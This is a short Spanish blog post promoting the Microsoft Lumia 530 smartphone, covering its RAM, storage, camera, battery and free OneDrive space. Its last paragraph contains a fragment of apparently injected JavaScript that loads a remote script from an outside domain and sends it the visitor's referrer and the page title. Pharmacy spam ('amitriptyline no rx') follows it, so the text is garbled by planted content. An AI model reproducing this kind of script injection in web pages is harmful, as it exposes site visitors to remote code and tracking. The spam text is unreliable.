Home / Publicaciones / Actualidades / Tecnología / “Microsoft Lumia 530”, El Smartphone Que Debes Tener!

“Microsoft Lumia 530”, El Smartphone Que Debes Tener!

Desde su salida al mercado, El Microsoft Lumia 530 ha demostrado ser un celular de fácil uso, con una impresionante duración de la batería< !more> y características ineludibles para todas aquellas personas que buscan un Smartphone con Windows de costo asequible, con las particularidades de última generación dentro su novedoso sistema operativo Windows 8.1.

El Lumia 530 incluye 512MB de RAM, 4GB de almacenamiento interno expandible hasta 128GB mediante una microSD, cámara trasera de 5MP, un potente SoC snapdragon 200 a 1,2GHz y una batería de 1.430Mah proporcionado hasta 10 horas de conversación continua en una red 3G.

También ofrece la fascinante experiencia en el uso del Windows 8.1 y 15GB de almacenamiento en el OneDrive, totalmente gratis.

A la hora de buscar un teléfono inteligente con características de tecnología de punta a bajo costo, EL Microsoft Lumia 530 debe ser tu primera opción.s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; amitriptyline no rx

About Juan Pablo Martinez

Analista de sistemas y webmaster de hobby, siempre en la búsqueda del moro perdido...